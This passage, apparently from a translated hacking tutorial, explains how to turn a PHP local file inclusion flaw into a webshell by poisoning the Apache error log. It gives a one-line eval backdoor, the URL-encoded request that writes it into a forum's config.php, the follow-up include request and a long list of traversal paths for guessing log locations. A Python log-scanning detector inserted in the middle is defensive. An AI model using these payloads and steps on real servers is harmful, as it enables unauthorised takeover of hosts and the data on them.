Because the approach above is very impractical (in my testing I found the log quickly growing to tens of megabytes, which makes it no fun to play with), let's think one step further: we write a real webshell that we can use, which is also far better than the painfully slow method above.
For example, take this same one-line backdoor:
<?eval($_POST[cmd]);?>
By now you may have thought of it: this is a pretty good method. Reading on, how to write the file becomes the question. We use this statement: fopen opens the file /home/virtual/www.xxx.com/forum/config.php, then writes the one-line backdoor server-side statement <?eval($_POST[cmd]);?> into it. Joined together as a PHP statement it is:
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");fclose($fp);?> // writes the one-line backdoor into config.php
We submit this and let Apache record it in the error log; including the log then writes the shell successfully. Remember that it must be converted to URL-encoded form to succeed.
Converted, it becomes:
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
We submit:
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
That way the error log records this line of webshell-writing code.
Now we include the log again, submitting:
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
The webshell is now written: config.php contains the one-line backdoor.
OK.
http://www.xxx.com/forum/config.php has become our webshell.
Connect to it directly with lanker's client, and the host is yours.
PS: Everything above requires the directory permissions to be writable; it must be -rwxrwxrwx (777) to proceed, which you can check directly with the directory listing shown earlier. Everything above is exploitation under the assumption that the log path is known.
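As an added example (not from the original post), a small Python detector for the two request patterns this technique leaves in Apache logs: a PHP open tag plus a sensitive function call inside a request path (the poisoning step), and an include parameter that points at a log file (the inclusion step). The log lines, hostnames and addresses are constructed for the demonstration; the parameter name zizzy is the one from the post.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not real traffic): one error-log entry written
# by a poisoned request, two access-log entries of the follow-up include
# requests, and one benign request.
SAMPLE_LOG = """\
[Sat Mar 10 12:00:01 2007] [error] [client 10.0.0.5] File does not exist: /home/virtual/www.example.com/htdocs/<?eval($_POST[cmd]);?>
10.0.0.5 - - [10/Mar/2007:12:00:02 +0000] "GET /z.php?zizzy=/home/virtual/www.example.com/logs/www-error_log HTTP/1.1" 200 512
10.0.0.5 - - [10/Mar/2007:12:00:03 +0000] "GET /z.php?zizzy=../../../../var/log/apache/error_log HTTP/1.1" 200 512
10.0.0.9 - - [10/Mar/2007:12:00:04 +0000] "GET /forum/index.php?page=2 HTTP/1.1" 200 4096
"""

PHP_TAG = re.compile(r"<\?(php|=)?", re.I)
PHP_CALL = re.compile(r"\b(eval|fopen|fputs|fwrite|system|passthru|shell_exec)\s*\(", re.I)
# a parameter value that walks up the tree or names a typical Apache log location
LOG_PATH = re.compile(r"(\.\./|/var/log/|/logs/|/httpd/|/apache/).*log", re.I)
REQUEST = re.compile(r'"(?:GET|POST) [^ ]*\?([^ "]+)')

def classify(line):
    """Return the findings for one Apache log line (empty list if nothing suspicious)."""
    # Apache stores the decoded path in the error log but the raw request line in the
    # access log, so decode twice to also catch double-encoded (%25xx) requests.
    decoded = unquote(unquote(line))
    findings = []
    if PHP_TAG.search(decoded) and PHP_CALL.search(decoded):
        findings.append("log-poisoning: PHP code in request")
    m = REQUEST.search(line)
    if m:
        for param in m.group(1).split("&"):
            _, _, value = param.partition("=")
            if LOG_PATH.search(unquote(value)):
                findings.append("lfi: parameter references a log file")
                break
    return findings

def scan(log_text):
    """Scan a whole log and return (line number, finding) pairs."""
    return [(n, f) for n, line in enumerate(log_text.splitlines(), 1) for f in classify(line)]

if __name__ == "__main__":
    for n, finding in scan(SAMPLE_LOG):
        print(f"line {n}: {finding}")
```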
For other log paths, you can guess them, or refer to the list here:
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/error_log